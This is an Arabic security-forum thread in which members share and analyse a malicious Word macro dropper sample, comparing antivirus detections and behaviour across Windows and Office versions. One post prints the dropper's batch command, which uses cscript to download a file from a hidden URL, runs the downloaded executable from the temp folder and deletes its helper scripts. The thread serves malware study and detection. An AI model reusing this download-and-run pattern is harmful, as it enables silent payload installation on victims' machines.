الحالة
مغلق و غير مفتوح للمزيد من الردود.

Abdulmuhaimen

زيزوومي VIP
إنضم
18 يونيو 2008
المشاركات
1,066
مستوى التفاعل
2,795
النقاط
1,220
الإقامة
Tripoli - Libya
غير متصل
السلام عليكم ورحمة الله وبركاته

أخواني أعضاء منتدى زيزوووم الغالي :222D

بعد غياب لفترة ليست بالقصيرة ;222) , عدنا مجدداً بعينة خبيثة من نوع

Word File تحتوي على فايروس خبيث من نوع Macro

رابط العينة

[hide]
يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي
[/hide]

كلمة المرور

[hide]infected[/hide]

بانتظار تجارب الاعضاء :222love:

:: تحياتي ::
 

توقيع : Abdulmuhaimen
وعليكم السلام ورحمة الله وبركاته أخي جاري فحصها

كنت أعد واحدة مثلها للشباب :222D
 
توقيع : MagicianMiDo32
بعد الفحص وجدت أن الملف لن يعمل سوى على ويندوز أكس بي
لن يعمل على أوفيس 2013

الماكرو مغلقة بباسوورد لكن بشكل غريب لابد من تشغيلها يدويا لكنها لاتفك نفسها

ود
 
توقيع : MagicianMiDo32
نود قام بتنظيف الملف بمجرد فك الضغط

scan_446236.doc » MIME » part003.bin - VBA/TrojanDropper.Agent.FY trojan
 
بعد الفحص وجدت أن الملف لن يعمل سوى على ويندوز أكس بي
لن يعمل على أوفيس 2013

الماكرو مغلقة بباسوورد لكن بشكل غريب لابد من تشغيلها يدويا لكنها لاتفك نفسها

ود

بالفعل الماكرو Macro يعمل بشكل يدوي ( ربما يعود ذلك بسبب إن الحالة الافتراضية للماكرو غير مفعل )

أما بخصوص أنه لا يعمل الا على نظام التشغيل Windows XP فالماكرو أشتغل عندي على

Windows 10 , Microsoft Office 2016
 
توقيع : Abdulmuhaimen
نود قام بتنظيف الملف بمجرد فك الضغط

scan_446236.doc » MIME » part003.bin - VBA/TrojanDropper.Agent.FY trojan
أجل أعلم ذلك فهذا التهديد ظهر تحديداً يوم 2016/03/02

لكن الذي لم أعرفه هو إنك تستعمل برمجيات شركة ESET :222D

فهل تركت معشوقك الافيرا AVIRA :222p
 
توقيع : Abdulmuhaimen
أجل أعلم ذلك فهذا التهديد ظهر تحديداً يوم 2016/03/02

لكن الذي لم أعرفه هو إنك تستعمل برمجيات شركة ESET :222D

فهل تركت معشوقك الافيرا AVIRA :222p

iههههههههههههههههه

عندي جهزين واحد افيرا مواصفاته عالية و واحد ايست اصدار 8 مواصفاته ضعيفة

اول برنامج استخدمته افيرا ثم افاست اصدار 4 الازرق ثم ايست اتركه ثم ارجع اليه لكن افيرا لا يفارقني


لكن الغبي فيهم هو افاست
 
التعديل الأخير:

بالفعل الماكرو Macro يعمل بشكل يدوي ( ربما يعود ذلك بسبب إن الحالة الافتراضية للماكرو غير مفعل )

أما بخصوص أنه لا يعمل الا على نظام التشغيل Windows XP فالماكرو أشتغل عندي على

Windows 10 , Microsoft Office 2016
ممكن لان نظامي 64 بت

ان شاء الله سأعاود النظر للملف أنا استخدم اوفيس 2013
 
توقيع : MagicianMiDo32
ممكن لان نظامي 64 بت

ان شاء الله سأعاود النظر للملف أنا استخدم اوفيس 2013

وأنا أيضا نظامي 64Bit

تمت التجربه بأستثناء الملف ... ( المقصود بها أستثناء الملف من الفحص في الوقت الحقيقي )

بعد تشغيل الملف بلحظات ظهرت الرسالة التالية

hWvsn3T


VgmGM9H


وهذا جزء بسيط من التجربة :222D

:: تحياتي ::​
 
توقيع : Abdulmuhaimen
وعليكم السلام ورحمة الله وبركاته

نتيجة المكافي

بمجرد فك الضغط لا شي

بالفحص:coffee:

39137b716ccc112.jpg


وشكرآآآ لك اخي ع جلب العينة
 
توقيع : الاعصار الابيضالاعصار الابيض is verified member.

وأنا أيضا نظامي 64Bit

تمت التجربه بأستثناء الملف ... ( المقصود بها أستثناء الملف من الفحص في الوقت الحقيقي )

بعد تشغيل الملف بلحظات ظهرت الرسالة التالية

hWvsn3T


VgmGM9H


وهذا جزء بسيط من التجربة :222D

:: تحياتي ::​


واضح انه ماكرو من نوع dropper يقوم بتنزيل ملف البات ثم تشغيله
الماكرو يكتب بلغة الفيجوال بيسيك VBA

الماكرو العادي الذي أعرفه يقوم بتنفيذ أوامرpowersell مباشرة لكن هذا الأخ هنا نزل ملف البات بأكمله في الtemp
يعتبر حرق الملف لانه لو كان نفذه من برنامج الورد نفسه لكان تخطى حمايات كثيرة لكنه استخرجه في التمب ليس أكثر
كأنه ملف بات فقط ليس ماكرو

==

عندما احاول فتح سورس الماكرو من ادوات المطور في الورد يطلب مني باسوورد
جربت برامج كثيرة لكسر الباسوورد لكن جميعها لم ينجح ,, يقول unknow file format

جربت كذلك البحث عن وسم هاش الباسوورد passwordhash\*وحذفه لحذف الباسوورد لكن لم اجده في الملف الأصلي بعد تعديله لصيغة RTF او بالهيكس
لم أشغل الملف على جهازي الحقيقي لا أملك برنامج حماية جربته فالساندبوكس لكنه لم يعمل لسبب ما قمت بتشغيله مجددا واستطعت استخراج الملفات والحد لله :222LOL:


لكن للأسف لم أتمكن من كسر الباسوورد :222oops:

وجاري التحليل :coffee:
 
توقيع : MagicianMiDo32
ألف شكر لك
الأفاست ..

1.webp
 
توقيع : أبو رمش
ملف البات



مجموعة أوامر للتمويه ليس إلا ثم هذا الامر


[hide]
cscript //Nologo %DLOAD_SCRIPT%
يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي
%TMP%\dsdsfvvb.exe & start %TMP%\dsdsfvvb.exe & del %TMP%\ytredasdf1.vbs & del %TMP%\tdfvhjdsf1.bat

لتحميل ملفات من النت

[/hide]


السكربت خاص بعمل HTTP Request
و Network Stream

لتحميل السيرفر الأصلي
,وشكرا لأخي عبد المهيمن على العينة القوية والجميلة
ألف شكر لك
الأفاست ..

مشاهدة المرفق 109278



يا أهلا ياسهلا

كيفك ياغال شرفت ونورت


مفتقدينك كثير في القسم
 
التعديل الأخير:
توقيع : MagicianMiDo32
هلا وغلا النور نوركم يا غالي ............
 
توقيع : أبو رمش
الحالة
مغلق و غير مفتوح للمزيد من الردود.
عودة
أعلى